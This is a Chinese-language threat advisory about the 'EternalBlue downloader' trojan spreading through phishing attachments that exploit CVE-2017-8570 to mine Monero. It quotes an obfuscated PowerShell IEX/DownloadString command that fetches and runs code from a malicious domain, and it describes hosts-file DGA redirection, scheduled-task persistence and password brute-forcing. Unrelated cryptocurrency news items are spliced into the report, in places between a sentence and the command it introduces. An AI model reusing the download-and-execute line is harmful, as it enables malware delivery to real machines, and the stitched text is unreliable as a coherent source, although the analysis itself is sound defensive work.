加密貨幣:“永恒之藍下載器木馬”新增釣魚郵件傳播，利用用戶機器挖礦門羅幣_COMFI

來源：騰訊御見威脅情報中心

編者注：原標題為《“永恒之藍下載器木馬”新增釣魚郵件傳播，附件含CVE-2017-8570漏洞攻擊代碼》

“永恒之藍”下載器木馬在感染用戶機器上運行后，會自動當前用戶的郵箱通訊錄并發送附件為urgent.doc的文檔，該文檔附帶CVE-2017-8570漏洞攻擊代碼。

如果被攻擊用戶收到郵件并不慎打開文檔，就可能觸發漏洞執行Powershell命令下載mail.jsp：

報告：越來越多的發展中國家正在遠離美元和其他法定貨幣，將注意力轉向比特幣等數字貨幣:金色財經報道，Chain發布的報告顯示，鑒于全球變化，越來越多的發展中國家正在遠離美元和其他法定貨幣，同時將注意力轉向比特幣等數字貨幣。最近幾個月，黎巴嫩等國家的通貨膨脹率達到驚人的 264%，報告顯示該國對采用加密貨幣的興趣大幅上升。

津巴布韋十多年來一直在與貨幣波動和通貨膨脹作斗爭。2009年因惡性通脹該國采用美元作為其貨幣。津巴布韋元于 2019 年重新引入以重振當地經濟，但隨后再次出現波動。2023年，津巴布韋還是在重振本國經濟的最新嘗試中出售了數百萬黃金支持的數字代幣。

加密貨幣在某些地區通常被視為不穩定的資產，對于應對嚴重惡性通貨膨脹、經濟不穩定和銀行準入受限的國家來說具有不同的吸引力。[2023/5/29 9:48:01]

C:/Windows/System32/cmd.exe/cpowershellIE`x(Ne`w-Obj`ectNet.WebC`lient).DownLoadString(http://ap35nf7.jp/mail.jsp?Administrator*OUHH1)

OSC：超過30%的加拿大人未來一年計劃購買加密貨幣:金色財經報道，加拿大安大略省證券委員會（OSC）首席執行官Grant Vingoe重申了該監管機構對加密貨幣的技術中立立場，同時表示許多加拿大人計劃在不久的將來成為HODLers。他說，股票和債券的監管基本原理同樣適用于加密貨幣，“絕大多數基于加密貨幣的實體”都屬于安大略省證券委員會的管轄范圍。監管機構主要認為比特幣（BTC）和以太坊（ETH）為商品，而“交易平臺與投資者達成的協議”則構成證券。

Vingoe說：“我們從自己的研究中得知（本月晚些時候公布），超過30%的加拿大人未來一年計劃購買加密資產。禁止不合規的公司在加拿大提供服務是一個挑戰。以有限的預算和有限的執法工作人員來覆蓋我們的整個資本市場，我們能做的只有這么多。但我們正在取得進展。”（Cointelegraph）[2022/10/7 18:41:32]

而下載使用的域名ap35nf7.jp實際上并沒有注冊，但是依然能夠解析到地址：t.awcna.com，是因為被感染機器的本地hosts文件被篡改，使得隨機生成的域名映射到木馬使用的惡意地址，細節請參考御見威脅情報中心此前發布的報告：《“永恒之藍下載器”木馬篡改hosts指向隨機域名，再用多個漏洞攻擊內網挖礦》。

DeFi收益協議Timeless Finance上線以太坊主網:6月21日消息，DeFi收益協議Timeless Finance上線以太坊主網。據悉，Timeless不僅作為鏈上收益市場，而且具有高度流動性和可擴展性，即可以提高收益率或對沖收益率下降。Timeless Finance推出的第一個收益市場是YearnWETH金庫。[2022/6/21 4:42:55]

本次攻擊過程中，木馬將使用隨機生成的字符加“.cn”或”.jp“或”.kr“后綴作為DGA域名，并在hosts文件中指向域名：

t.tr2q.com,t.awcna.com,t.amynx.com

mail.jsp經過高度混淆，多次解密后可以看到其安裝多個計劃任務下載Powershell腳本執行，并使用了新的計劃任務名：

“Bluetea“藍茶。

“永恒之藍”下載器木馬自出現之后從未停止更新，從最初的PE樣本攻擊到后來轉移為以Powershell無文件攻擊方式躲避查殺，并且通過安裝多個類型的計劃任務進行持久化。在傳播方式上，最初通過供應鏈攻擊積累一批感染機器后，又不斷利用”永恒之藍”漏洞，MSSql爆破，$IPC爆破，RDP爆破等方法進行擴散傳播，近期又增加了DGA域名攻擊和釣魚郵件攻擊，其最終目的只為利用用戶機器挖礦門羅幣獲利。

永恒之藍下載器木馬的歷次版本更新參考下表：

安全建議

1.建議用戶不要輕易打開不明來源的郵件附件，對于郵件附件中的文件要格外謹慎運行，如發現有腳本或其他可執行文件可先使用殺軟件進行掃描；

2.服務器使用安全的密碼策略，特別是IPC$、MSSQL、RDP賬號密碼，切勿使用弱口令，避免遭遇弱密碼爆破攻擊；

3.根據微軟安全公告及時修復Office漏洞CVE-2017-8570，需進行漏洞掃描和修復，或采用WindowsUpdate進行。

IOCs

http//t.awcna.com/mail.jsp

Tags：加密貨幣ELECOMMAI加密貨幣最新消息與新聞ELEF幣COMFIMAIN價格

波場